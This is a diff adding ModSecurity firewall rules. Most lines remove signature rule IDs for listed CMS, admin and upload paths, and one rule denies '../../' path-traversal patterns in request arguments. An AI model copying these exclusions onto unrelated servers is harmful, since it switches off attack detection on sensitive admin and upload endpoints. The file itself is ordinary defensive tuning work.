+SecRule REQUEST_FILENAME "/cms/pagina_edit\.php" "phase:2,id:92256,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:92257,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/connectors/index\.php" "phase:2,id:92258,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/getxml\.php" "phase:2,id:92259,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajax-tab\.php" "phase:2,id:92260,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92261,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/livechat/mobile/chat\.php" "phase:2,id:92262,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340574,ctl:ruleRemovebyID=340573"
+
+SecRule REQUEST_FILENAME "/soap\.hsp" "phase:2,id:92263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=340122"
+
+SecRule REQUEST_FILENAME "/mailman/admindb/*" "phase:2,id:92264,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:92265,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/sort_edit\.php" "phase:2,id:92266,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/geweest\.php" "phase:2,id:92267,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/project/project_item\.php" "phase:2,id:92268,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pdfjs-viewer-shortcode/web/viewer\.php" "phase:2,id:92269,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/process_submission\.php" "phase:2,id:92270,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajax-upgradetab\.php" "phase:2,id:92271,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=341155"
+
+SecRule REQUEST_FILENAME "/updatemail\.php" "phase:2,id:92272,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/toevoegen_gemee\.php" "phase:2,id:92273,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cms_gemeentetiel/" "phase:2,id:92274,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/deleteblogui\.php" "phase:2,id:92275,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/check_mandatory_fields\.php" "phase:2,id:92276,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/assets/components/migx/connector\.php" "phase:2,id:92277,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/administration/modifier/formulaire\.php" "phase:2,id:92278,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:92279,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/admin/edit_config\.php" "phase:2,id:92280,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admineditevent\.php" "phase:2,id:92281,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/article_edit\.php" "phase:2,id:92282,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/serendipity_admin\.php" "phase:2,id:92283,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/upload_resize\.php" "phase:2,id:92284,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/main/php/editor\.php" "phase:2,id:92285,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128"
+
+SecRule REQUEST_FILENAME "/scp/canned\.php" "phase:2,id:92286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/scp/tickets\.php" "phase:2,id:92287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/scp/settings\.php" "phase:2,id:92288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/didwegetthiswrong\.php" "phase:2,id:92289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/acp/config_payments_form\.php" "phase:2,id:92290,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/v2/edit\.php" "phase:2,id:92291,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/b/ss/appleusstartpage/" "phase:2,id:92292,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/script-youtube-bg\.php" "phase:2,id:92293,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/adm_vsz/servert_up\.php" "phase:2,id:92294,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/smb/web/web-server-settings/" "phase:2,id:92295,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/smb/web/edit/" "phase:2,id:92296,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/ajaxupload\.php" "phase:2,id:92297,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/ajaxupload2\.php" "phase:2,id:92298,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/searchreplacedb2\.php" "phase:2,id:92299,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/static/ajax\.php" "phase:2,id:92300,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/js/tiny_mce/plugins/filemanager/upload\.php" "phase:2,id:92301,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+SecAction "phase:2,id:92302,t:none,pass,nolog,skipAfter:END_RULES_92302"
+
+
+# Rule 340006: generic recursion signatures
+SecRule ARGS "\.\./\.\./"  	"chain,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,capture,id:344596,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"
+SecRule ARGS:path|ARGS:path_thumb "!(^\.\./\.\./\.\./\.\./\.\./media-upload/)"
+
+
+SecMarker END_RULES_92302
+
+SecRule REQUEST_FILENAME "/tools/payment_methods\.php" "phase:2,id:92303,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sitesetup\.php" "phase:2,id:92304,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:92305,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/addeditartikel\.php" "phase:2,id:92306,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/load1pdf\.php" "phase:2,id:92307,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/_cmsms/admin/moduleinterface\.php" "phase:2,id:92308,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/manage/ci_car_f\.php" "phase:2,id:92309,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/saveedititem\.php" "phase:2,id:92310,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:92311,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/livesupport/server\.php" "phase:2,id:92312,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/scripts/process_submission\.php" "phase:2,id:92313,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/admin/package_add_result\.php" "phase:2,id:92314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ee-admin\.php" "phase:2,id:92315,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/fulladmin/configproducts\.php" "phase:2,id:92316,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/product_options\.json\.php" "phase:2,id:92317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:92318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/fixtures_update\.php" "phase:2,id:92319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:92320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/vba_gallery_admin\.php" "phase:2,id:92321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/multitv\.connector\.php" "phase:2,id:92322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/e_editwrite\.php" "phase:2,id:92323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/e_date\.php" "phase:2,id:92324,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/dnsmanagement\.php" "phase:2,id:92325,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/clientarea\.php" "phase:2,id:92326,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/thumbnails\.php" "phase:2,id:92327,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/stats\.php" "phase:2,id:92328,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/agreement_edit\.php" "phase:2,id:92329,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/process/processdb\.php" "phase:2,id:92330,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/mdeploy\.php" "phase:2,id:92331,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/themify/img\.php" "phase:2,id:92332,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/worldpay\.php" "phase:2,id:92333,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:92334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/db_edit\.php" "phase:2,id:92335,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/admin/content\.php" "phase:2,id:92336,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/xoops/configproducts\.php" "phase:2,id:92337,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/engine/index\.php" "phase:2,id:92338,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/derefer\.php" "phase:2,id:92339,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/change_it\.php" "phase:2,id:92340,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/secure/moveissue\.jspa" "phase:2,id:92341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/configaddonmods\.php" "phase:2,id:92342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/edit_menu\.php" "phase:2,id:92343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/s/process\.php" "phase:2,id:92344,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/flash/gate\.php" "phase:2,id:92345,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=392301"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:92346,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/restaurant\.php" "phase:2,id:92347,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugins\.php" "phase:2,id:92348,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/item\.php" "phase:2,id:92349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/components/com_avchat3/chat/wget\.php" "phase:2,id:92350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/securimage_play\.swf" "phase:2,id:92351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/frontpageupdate\.php" "phase:2,id:92352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
